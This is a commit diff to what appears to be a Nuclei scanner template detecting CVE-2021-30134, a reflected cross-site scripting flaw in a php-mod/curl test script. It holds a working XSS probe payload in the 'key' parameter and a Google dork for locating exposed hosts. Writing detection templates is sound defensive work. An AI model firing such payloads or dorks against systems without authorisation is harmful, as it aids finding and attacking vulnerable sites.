updated matcher, request type, metadata

2023-02-16 10:54:57 +05:30 · 2023-02-16 10:54:57 +05:30 · 1ecbc31b58
parent f443ccf848
commit 1ecbc31b58
1 changed files with 19 additions and 15 deletions
--- a/cves/2021/CVE-2021-30134.yaml
+++ b/cves/2021/CVE-2021-30134.yaml
@ -1,7 +1,7 @@
 id: CVE-2021-30134

 info:
-  name: php-mod/curl Library - Unauthenticated Reflected Cross-Site Scripting (XSS)
+  name: php-mod/curl Library - Cross-Site Scripting
  author: theamanrawat
  severity: medium
  description: |
@ -10,24 +10,28 @@ info:
    - https://wpscan.com/vulnerability/0b547728-27d2-402e-ae17-90d539344ec7
    - https://nvd.nist.gov/vuln/detail/CVE-2021-30134
  classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
-    cvss-score: 6.1
    cve-id: CVE-2021-30134
-    cwe-id: CWE-79
  metadata:
    verified: "true"
-  tags: cve,cve2021,xss,php-mod,unauth
+    google-query: inurl:"/php-curl-test/post_file_path_upload.php"
+  tags: cve,cve2021,xss,php-mod

 requests:
-  - raw:
-      - |
-        GET /vendor/curl/curl/tests/server/php-curl-test/post_file_path_upload.php?key=<img%20src%20onerror%3dalert(1331)> HTTP/1.1
-        Host: {{Hostname}}
+  - method: GET
+    path:
+      - "{{BaseURL}}/vendor/curl/curl/tests/server/php-curl-test/post_file_path_upload.php?key=<img%20src%20onerror%3dalert(document.domain)>"

+    matchers-condition: and
    matchers:
-      - type: dsl
-        dsl:
-          - 'status_code == 200'
-          - 'contains(content_type, "text/html")'
-          - 'contains(body, "{\"request_method\":\"GET\",\"key\":\"<img src onerror=alert(1331)>\"")'
-        condition: and
+      - type: word
+        words:
+          - 'key":"<img src onerror=alert(document.domain)>"'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200